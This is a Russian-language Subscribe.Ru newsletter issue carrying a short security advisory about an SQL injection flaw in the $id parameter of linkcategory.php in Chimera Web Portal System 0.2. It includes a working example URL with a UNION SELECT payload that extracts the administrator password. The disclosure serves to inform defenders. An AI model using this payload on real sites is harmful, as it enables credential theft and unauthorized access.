Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Chimera Web Portal System.


Информационный Канал Subscribe.Ru

Компьютер для продвинутых пользователей
Содержание:
Chimera Web Portal System
ПО: Chimera Web Portal System
Версия: 0.2

Описание:
Уязвимость скрипт:
linkcategory.php
Уязвимость находится в $id и позволяет выполнить SQL-инъекцию для получения пароля администратора.
Обязательно: gpc_magic_quotes = off
Пример:
http://host/chimera/linkcategory.php?id=9999'%20union%20select%20admin_password%20from%20admin/*
Chimera Web Portal System
Рассылка создана и ведется при поддержке Информационной сети Пермского края.

Subscribe.Ru
Поддержка подписчиков
Другие рассылки этой тематики
Другие рассылки этого автора
Подписан адрес:
Код этой рассылки: comp.paper.supuser
Архив рассылки
Отписаться Вебом Почтой
Вспомнить пароль

В избранное